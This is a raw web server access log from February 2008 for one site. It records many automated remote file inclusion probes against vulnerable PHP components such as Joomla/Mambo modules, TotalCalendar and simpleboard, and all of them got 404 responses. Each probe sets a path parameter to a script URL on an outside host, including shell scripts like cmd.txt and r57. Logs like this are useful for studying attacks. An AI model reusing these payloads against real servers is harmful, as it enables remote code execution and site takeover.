83.12.24.107 - - [25/Feb/2008:06:29:39 -0800] "GET /logs/access_080211.log/components/com_simpleboard/image_upload.php?sbp=http://www.paradstars.com/en/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.250.95.201 - - [25/Feb/2008:06:30:41 -0800] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=http://yugifire.t35.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.250.95.201 - - [25/Feb/2008:06:30:42 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://yugifire.t35.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.250.95.201 - - [25/Feb/2008:06:30:43 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://yugifire.t35.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.45.242.50 - - [25/Feb/2008:06:30:50 -0800] "GET /logs/index2.php?mosConfig_absolute_path=http://csinfo.pl/includes/union/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
66.45.242.50 - - [25/Feb/2008:06:30:52 -0800] "GET /index2.php?mosConfig_absolute_path=http://csinfo.pl/includes/union/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
91.192.194.37 - - [25/Feb/2008:06:31:24 -0800] "GET /logs/access_080201.log/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.sambis.ru/forum/files/sambis.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.239.78.91 - - [25/Feb/2008:06:31:25 -0800] "GET /logs/access_080117.log//admin/index.php?loadadminpage=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.239.78.91 - - [25/Feb/2008:06:31:26 -0800] "GET //admin/index.php?loadadminpage=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.239.78.91 - - [25/Feb/2008:06:31:26 -0800] "GET /logs//admin/index.php?loadadminpage=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.233.19.105 - - [25/Feb/2008:06:32:37 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
211.233.19.105 - - [25/Feb/2008:06:32:37 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
216.187.94.179 - - [25/Feb/2008:06:33:28 -0800] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.indicce.com/images/r57? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.28.164 - - [25/Feb/2008:06:34:21 -0800] "GET /minamijewelry/?S=A HTTP/1.0" 200 2094 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
207.44.248.81 - - [25/Feb/2008:06:34:41 -0800] "GET /logs/access_080108.log/config.inc.php?path_escape=http://x.apescar.net/r1.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.248.81 - - [25/Feb/2008:06:34:44 -0800] "GET /config.inc.php?path_escape=http://x.apescar.net/r1.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.248.81 - - [25/Feb/2008:06:34:45 -0800] "GET /logs/config.inc.php?path_escape=http://x.apescar.net/r1.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.58.146 - - [25/Feb/2008:06:34:46 -0800] "GET /logs/access_080117.log/components/com_simpleboard/image_upload.php?sbp=http://statesidelogistics.com/images/r7.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.58.146 - - [25/Feb/2008:06:34:46 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://statesidelogistics.com/images/r7.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.58.146 - - [25/Feb/2008:06:35:10 -0800] "GET /logs/access_080211.log/components/com_simpleboard/image_upload.php?sbp=http://statesidelogistics.com/images/r7.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.19.3.162 - - [25/Feb/2008:06:36:30 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.hsbithui.com/modules/Forums/admin/log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.119.152.152 - - [25/Feb/2008:06:36:34 -0800] "GET /appserv/main.php?appserv_root=http://gnome.org.ua//components/com_zoom/classes/iptc//makernotes/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
85.119.152.152 - - [25/Feb/2008:06:36:34 -0800] "GET /logs/appserv/main.php?appserv_root=http://gnome.org.ua//components/com_zoom/classes/iptc//makernotes/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
64.185.237.143 - - [25/Feb/2008:06:36:42 -0800] "GET /logs/access_080108.log//templates/mangobery/footer.sample.php?Site_Path=http://www.ilegais.xpg.com.br/www??????????????????????????http://ilegals.ifrance.com/enos???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.143 - - [25/Feb/2008:06:36:42 -0800] "GET //templates/mangobery/footer.sample.php?Site_Path=http://www.ilegais.xpg.com.br/www??????????????????????????http://ilegals.ifrance.com/enos???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.143 - - [25/Feb/2008:06:36:43 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://www.ilegais.xpg.com.br/www??????????????????????????http://ilegals.ifrance.com/enos???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.195.58.163 - - [25/Feb/2008:06:37:13 -0800] "GET / HTTP/1.0" 200 3078 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.238.165.117 - - [25/Feb/2008:06:37:20 -0800] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.238.165.117 - - [25/Feb/2008:06:37:20 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.238.165.117 - - [25/Feb/2008:06:37:21 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.15.64.77 - - [25/Feb/2008:06:37:53 -0800] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=http://navajosquare.com/components/com_simpleboard/safe.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.64.77 - - [25/Feb/2008:06:37:53 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://navajosquare.com/components/com_simpleboard/safe.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.64.77 - - [25/Feb/2008:06:37:55 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://navajosquare.com/components/com_simpleboard/safe.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.7.68 - - [25/Feb/2008:06:38:46 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
211.233.7.68 - - [25/Feb/2008:06:38:46 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.19.3.162 - - [25/Feb/2008:06:40:03 -0800] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=http://www.hsbithui.com/modules/Forums/admin/log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.19.3.162 - - [25/Feb/2008:06:40:03 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.hsbithui.com/modules/Forums/admin/log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.226.79.133 - - [25/Feb/2008:06:40:04 -0800] "GET /logs/access_080117.log/components/com_simpleboard/image_upload.php?sbp=http://statesidelogistics.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.19.3.162 - - [25/Feb/2008:06:40:04 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.hsbithui.com/modules/Forums/admin/log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.226.79.133 - - [25/Feb/2008:06:40:05 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://statesidelogistics.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [25/Feb/2008:06:40:27 -0800] "GET /logs/access_080211.log/components/com_simpleboard/image_upload.php?sbp=http://statesidelogistics.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.69.192.133 - - [25/Feb/2008:06:40:51 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.hsbithui.com/modules/Forums/admin/log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.234.102.6 - - [25/Feb/2008:06:40:51 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/ntchack/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.79.13 - - [25/Feb/2008:06:41:00 -0800] "GET //claroline/tracking/userLog.php?rootSys=http://gnome.org.ua//components/com_zoom/classes/iptc//makernotes/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
85.214.79.13 - - [25/Feb/2008:06:41:00 -0800] "GET /logs//claroline/tracking/userLog.php?rootSys=http://gnome.org.ua//components/com_zoom/classes/iptc//makernotes/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
201.35.66.58 - - [25/Feb/2008:06:41:33 -0800] "GET /logs/access_080201.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.35.66.58 - - [25/Feb/2008:06:41:37 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.35.66.58 - - [25/Feb/2008:06:41:41 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.35.84.213 - - [25/Feb/2008:06:42:11 -0800] "GET /logs/access_080211.log//modules/TotalCalendar/about.php?inc_dir=http://madinaedu.gov.sa/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.35.84.213 - - [25/Feb/2008:06:42:12 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://madinaedu.gov.sa/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.35.84.213 - - [25/Feb/2008:06:42:18 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://madinaedu.gov.sa/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.238.165.117 - - [25/Feb/2008:06:42:30 -0800] "GET /logs/access_080120.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.99.194.216 - - [25/Feb/2008:06:42:33 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.algebramovie.com/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.30.249.131 - - [25/Feb/2008:06:42:42 -0800] "GET /logs/access_080117.log//modules/TotalCalendar/about.php?inc_dir=http://madinaedu.gov.sa/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.45.242.50 - - [25/Feb/2008:06:43:01 -0800] "GET /logs/Bmodules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://csinfo.pl/includes/union/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
66.45.242.50 - - [25/Feb/2008:06:43:03 -0800] "GET /Bmodules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://csinfo.pl/includes/union/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
62.30.249.131 - - [25/Feb/2008:06:43:26 -0800] "GET /logs/access_080211.log//modules/TotalCalendar/about.php?inc_dir=http://avvvv.altervista.org/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.35.84.213 - - [25/Feb/2008:06:43:28 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://avvvv.altervista.org/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.35.84.213 - - [25/Feb/2008:06:43:28 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://avvvv.altervista.org/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.185.237.143 - - [25/Feb/2008:06:43:37 -0800] "GET /logs/access_080131.log//templates/mangobery/footer.sample.php?Site_Path=http://www.ilegais.xpg.com.br/www??????????????????????????http://ilegals.ifrance.com/enos???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.35.84.213 - - [25/Feb/2008:06:43:44 -0800] "GET /logs/access_080117.log//modules/TotalCalendar/about.php?inc_dir=http://avvvv.altervista.org/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.193.127.94 - - [25/Feb/2008:06:44:07 -0800] "GET /index.php?option=com_joomlacloud&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.7.115 - - [25/Feb/2008:06:44:11 -0800] "GET /logs/access_070914.log HTTP/1.0" 200 86919 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
201.103.136.133 - - [25/Feb/2008:06:44:13 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.193.127.94 - - [25/Feb/2008:06:45:28 -0800] "GET /logs/access_080118.log/index.php?option=com_joomlacloud&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.193.127.94 - - [25/Feb/2008:06:45:29 -0800] "GET /logs/index.php?option=com_joomlacloud&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.45.242.50 - - [25/Feb/2008:06:45:50 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://csinfo.pl/includes/union/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
66.45.242.50 - - [25/Feb/2008:06:45:51 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://csinfo.pl/includes/union/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
203.211.145.2 - - [25/Feb/2008:06:45:55 -0800] "GET /config.inc.php?path_escape=http://www.cabinmagic.com/catalog/icon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.35.84.213 - - [25/Feb/2008:06:46:02 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://madinaedu.gov.sa/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.19.3.162 - - [25/Feb/2008:06:46:08 -0800] "GET /logs/access_080123.log//modules/TotalCalendar/about.php?inc_dir=http://www.hsbithui.com/modules/Forums/admin/log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.35.84.213 - - [25/Feb/2008:06:46:34 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://avvvv.altervista.org/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.64.77 - - [25/Feb/2008:06:46:53 -0800] "GET /logs/access_080123.log//modules/TotalCalendar/about.php?inc_dir=http://navajosquare.com/components/com_simpleboard/safe.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.19.105 - - [25/Feb/2008:06:47:11 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
211.233.19.105 - - [25/Feb/2008:06:47:11 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
87.117.225.155 - - [25/Feb/2008:06:47:38 -0800] "GET /logs/access_080118.log//components/com_simpleboard/image_upload.php?sbp=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.117.225.155 - - [25/Feb/2008:06:47:39 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.117.225.155 - - [25/Feb/2008:06:47:39 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.92.110.110 - - [25/Feb/2008:06:48:26 -0800] "GET /logs/access_080108.log//templates/mangobery/footer.sample.php?Site_Path=http://www.ilegais.xpg.com.br/www??????????????????????????http://ilegals.ifrance.com/enos???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.92.110.110 - - [25/Feb/2008:06:48:27 -0800] "GET //templates/mangobery/footer.sample.php?Site_Path=http://www.ilegais.xpg.com.br/www??????????????????????????http://ilegals.ifrance.com/enos???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.92.110.110 - - [25/Feb/2008:06:48:27 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://www.ilegais.xpg.com.br/www??????????????????????????http://ilegals.ifrance.com/enos???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.136.6.38 - - [25/Feb/2008:06:48:42 -0800] "GET /logs/access_080201.log//components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.perfilamos.com/administrator/components/com_mambots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.136.6.38 - - [25/Feb/2008:06:48:42 -0800] "GET //components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.perfilamos.com/administrator/components/com_mambots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.136.6.38 - - [25/Feb/2008:06:48:43 -0800] "GET /logs//components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.perfilamos.com/administrator/components/com_mambots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.223.16.102 - - [25/Feb/2008:06:48:44 -0800] "GET /logs/access_080117.log/components/com_forum/download.php?phpbb_root_path=http://netbr.org/documents/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.223.16.102 - - [25/Feb/2008:06:48:45 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://netbr.org/documents/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.223.16.102 - - [25/Feb/2008:06:48:46 -0800] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://netbr.org/documents/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
130.161.158.3 - - [25/Feb/2008:06:49:04 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://arcadiaz.free.fr/map/mambo?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
130.161.158.3 - - [25/Feb/2008:06:49:04 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://arcadiaz.free.fr/map/mambo?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
83.12.24.107 - - [25/Feb/2008:06:49:42 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.paradstars.com/en/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.63.66 - - [25/Feb/2008:06:50:00 -0800] "GET /logs/index.php?mosConfig_absolute_path=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
216.75.63.66 - - [25/Feb/2008:06:50:01 -0800] "GET /index.php?mosConfig_absolute_path=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
195.189.85.162 - - [25/Feb/2008:06:50:34 -0800] "GET /logs/access_080201.log/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.plantoursundpartner.de/_scripte/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
195.189.85.162 - - [25/Feb/2008:06:50:34 -0800] "GET /logs/access_080201.log/errors.php?error=http://www.plantoursundpartner.de/_scripte/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
195.189.85.162 - - [25/Feb/2008:06:50:34 -0800] "GET /components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.plantoursundpartner.de/_scripte/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
195.189.85.162 - - [25/Feb/2008:06:50:35 -0800] "GET /errors.php?error=http://www.plantoursundpartner.de/_scripte/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
195.189.85.162 - - [25/Feb/2008:06:50:35 -0800] "GET /logs/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.plantoursundpartner.de/_scripte/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
195.189.85.162 - - [25/Feb/2008:06:50:35 -0800] "GET /logs/errors.php?error=http://www.plantoursundpartner.de/_scripte/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
87.117.225.155 - - [25/Feb/2008:06:51:30 -0800] "GET /logs/access_080117.log//components/com_simpleboard/image_upload.php?sbp=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.92.204.1 - - [25/Feb/2008:06:51:46 -0800] "GET /zipndownload.php?PP_PATH=http://www.smagz.com/jim.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
81.92.204.1 - - [25/Feb/2008:06:51:46 -0800] "GET /logs/zipndownload.php?PP_PATH=http://www.smagz.com/jim.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
74.6.20.169 - - [25/Feb/2008:06:52:00 -0800] "GET /bikes/dteel/2008_01_26/?N=A HTTP/1.0" 200 6600 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
208.69.192.133 - - [25/Feb/2008:06:52:39 -0800] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=http://www.hsbithui.com/modules/Forums/admin/log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.69.192.133 - - [25/Feb/2008:06:52:39 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.hsbithui.com/modules/Forums/admin/log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.79.181.37 - - [25/Feb/2008:06:53:06 -0800] "GET /logs/access_080118.log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://190.8.128.58/.../alba.txt?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
217.79.181.37 - - [25/Feb/2008:06:53:06 -0800] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://190.8.128.58/.../alba.txt?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
217.79.181.37 - - [25/Feb/2008:06:53:07 -0800] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://190.8.128.58/.../alba.txt?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
213.239.212.210 - - [25/Feb/2008:06:53:22 -0800] "GET /logs/access_080123.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.239.212.210 - - [25/Feb/2008:06:53:23 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.239.212.210 - - [25/Feb/2008:06:53:24 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
